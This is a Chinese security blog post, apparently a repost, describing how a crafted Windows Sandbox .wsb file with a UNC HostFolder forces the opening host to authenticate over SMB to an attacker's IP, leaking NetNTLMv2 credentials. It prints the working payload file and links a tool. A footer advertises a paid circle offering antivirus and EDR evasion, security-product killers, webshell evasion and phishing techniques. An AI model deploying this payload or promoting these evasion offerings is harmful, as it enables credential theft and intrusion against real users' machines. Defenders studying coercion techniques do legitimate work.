文章总结: 本文介绍了一种通过构造恶意的.wsb沙箱配置文件,利用其解析阶段会访问UNC路径的特性,来触发目标主机进行SMBNTLMv2身份验证的内网漏洞利用思路。攻击者可借此泄露主机的NTLM凭证,相关工具已在GitHub上开源。 综合评分: 75 文章分类: 渗透测试,红队,内网渗透,恶意软件,安全工具
内网漏洞–NetNTLMv2泄露
原创
Hello888 Hello888
安全天书
2026年6月29日 14:08 广西
在小说阅读器读本章
去阅读
本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统等目的,一切后果由使用者自行承担!!!
漏洞介绍
在我对UNCanny项目的后续时,我注意到人们对那个基于UNC的强制原语很感兴趣,尽管那个项目有一些明显的局限性。所以我一直在探索同一个想法,想出版一些更体面、更实用、更实用、更适合初次接触的作品。
Windows 沙箱通常被视为打开不受信任文件的安全场所,这使得 .wsb 配置文件本身成为一个有趣的搜索对象。在沙箱访客运行之前,主机还需要解析配置文件并准备沙箱会话,在查看那个设置流程时,我专注于 MappedFolders。通常文档化的用例很简单,我们会把本地主机文件夹映射到沙箱里。所以剩下显而易见的问题是,如果HostFolder不是本地路径,而是UNC路径,会发生什么?
结果发现主机会尝试验证它。
<Configuration> <Networking>Disable</Networking> <MappedFolders> <MappedFolder> <HostFolder>\\192.168.139.132\wsbtest</HostFolder> <SandboxFolder>C:\Users\WDAGUtilityAccount\Desktop\share</SandboxFolder> <ReadOnly>true</ReadOnly> </MappedFolder> </MappedFolders></Configuration>
打开后,Windows主机对我的IP进行了SMB NTLM认证。沙盒可能之后无法初始化,因为目标不是真正的可访问共享,但认证已经完成。.wsb
GitHub地址:
https://github.com/0xHossam/UNCagedSandbox
注意:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测。
红蓝偶像练习生小圈子**
更多工具思路文章请加入纷传,圈子主要研究方向渗透测试、红蓝对抗、钓鱼手法思路、武器化,红队工具二开与免杀。圈内不定期分享红队技术文章,攻防经验总结以及自研工具与插件,目前圈子已满400人,欢迎各位进圈子交流学习!
****
圈子目前更新相关技术文章:**
* HeavenlyBypassAV内部版工具-轻松免杀各大杀软
-
HeBypassAV内部版Patch免杀工具-轻松绕过杀软EDR
-
Heavenly自动化红队后渗透工具免杀生成器
-
Heavenly白加黑自动化生成免杀工具
-
HeavenlyProtectionCS内部CS插件
-
冰蝎webshell免杀工具
-
哥斯拉webshell免杀工具
-
红队场景下lnk钓鱼Bypass免杀AV
-
Frp免杀隧道工具
-
1day和0dayPOC
-
lnk钓鱼思路视频讲解
-
lnk钓鱼Bypass天擎
-
msi钓鱼
-
chm钓鱼
-
Kill360核晶
-
AV对抗-致盲AV(核晶)
-
捆绑免杀360
-
Kill火绒
-
火绒6.0内存免杀
-
kill-windows Defender
-
Defender分离免杀
-
Defender知识点
-
EDR对抗思路
-
进程注入知识点
-
自启动思路
-
多种维权手法
-
Fscan免杀核晶
-
QVM解决思路
-
红队思路-钓鱼环境下小窗口截屏窃取
-
免杀Todesk/向日葵读取工具
-
渗透测试文章思路
-
内网对抗文章思路
-
*还有更多红队工具文章!期待您的加入!!!*
往期推荐**
安全天书免杀课来袭|助力实战免杀钓鱼(文末送福利)
Patch免杀0检测!!!绕过卡巴斯基、360、Defender、火绒等
【红队工具】红队内网后渗透CobaltStrike插件更新
绕过360安全卫士实现维权
免杀更新–Heavenly自动化生成白加黑3.0
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:安全天书 Hello888 Hello888《内网漏洞–NetNTLMv2泄露》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论